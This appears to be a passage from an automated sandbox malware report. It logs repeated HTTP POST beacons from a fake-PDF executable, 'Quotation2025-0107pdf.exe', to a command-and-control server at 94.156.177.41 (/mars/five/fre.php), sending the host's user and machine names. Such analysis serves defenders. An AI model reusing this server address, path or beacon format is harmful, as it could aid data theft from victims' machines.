                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:33.064765930 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:33.838028908 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:33 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    101192.168.2.45009494.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:33.988398075 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:33.993233919 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:34.750180006 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:34 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    102192.168.2.45010094.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:34.889396906 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:34.894253969 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:35.663187027 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:35 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    103192.168.2.45010694.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:35.810368061 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:35.815202951 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:36.542372942 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:36 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    104192.168.2.45011294.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:36.698333025 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:36.704613924 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:37.462203979 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:37 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    105192.168.2.45011494.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:37.612569094 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:37.618567944 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:38.350887060 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:38 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    106192.168.2.45011594.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:38.504566908 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:38.510581017 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:39.277570963 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:39 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    107192.168.2.45011694.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:39.422327995 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:39.427169085 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:40.149019003 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:40 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    108192.168.2.45011794.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:40.295356035 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:40.300156116 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:41.026386976 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:40 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    109192.168.2.45011894.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:41.173887968 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:41.178679943 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:42.068989992 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:41 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    110192.168.2.45011994.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:42.216561079 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:42.221421003 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:42.943598986 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:42 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    111192.168.2.45012094.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:43.098558903 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:43.104720116 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:43.909679890 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:43 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    112192.168.2.45012194.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:44.067322969 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:44.073014021 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:44.821574926 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:44 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    113192.168.2.45012294.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:44.973629951 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:44.978437901 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:45.693907022 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:45 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    114192.168.2.45012394.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:45.843873024 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:45.848722935 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:46.585503101 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:46 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    115192.168.2.45012494.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:46.731494904 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:46.736291885 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:47.641290903 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:47 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    116192.168.2.45012594.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:47.780200005 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:47.784972906 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:48.495321035 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:48 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    117192.168.2.45012694.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:48.637233973 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:48.642095089 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:49.400657892 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:49 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    118192.168.2.45012794.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:49.548605919 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:49.553436995 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
